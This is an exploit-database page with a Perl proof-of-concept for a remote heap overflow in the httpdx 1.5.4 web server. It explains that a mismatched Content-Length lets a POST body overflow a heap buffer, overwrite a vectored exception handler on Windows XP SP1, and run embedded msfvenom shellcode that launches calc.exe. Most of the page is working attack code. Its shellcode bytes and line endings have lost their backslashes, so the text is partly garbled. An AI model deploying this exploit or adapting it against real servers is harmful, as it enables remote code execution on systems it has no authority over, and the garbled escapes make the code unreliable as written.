[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : httpdx <= 1.5.4 Remote Heap Overflow
# Published : 2012-07-29
# Author :
# Previous Title : Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow
# Next Title : Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
# where 'size' is actually the value of "Content-Length" HTTP header..
# All post-data will then be copied into this area using strncpy(x,y,size2),
# where 'size2' = "request length" - "header length" (and not Content-Length)
#
# - As httpdx use it own handler function upon crash, this exploit overwrite
# the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both case, httpdx crash
# after the exploit.
#
# - WinXP SP1
# 0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;
# target
my $host = "127.0.0.1";
# The [perl|php|py|..] page to call during the POST request.
# The page must exists and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";
# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c ;
# pointer to out shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;
# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" .
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" .
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" .
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" .
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" .
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" .
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" .
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" .
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" .
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" .
"x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" .
"x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" .
"xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" .
"x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" .
"x65x78x65x00";
# flush after every write
$| = 1;
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $page HTTP/1.0rn" .
"Content-Length: 1023rn" .
"Content-Type: textrn" .
"Host: $host" . "rn" .
"rn" .
# shellcode
$shellcode .
# nops
"x90" x (1032-length($shellcode)) .
# VEH addr
pack('V', $veh_node_addr) .
# ptr to shellcode
pack('V', $sc_ptr)
;
# if any ...
while(<$sock>){
print $_;
}
exit;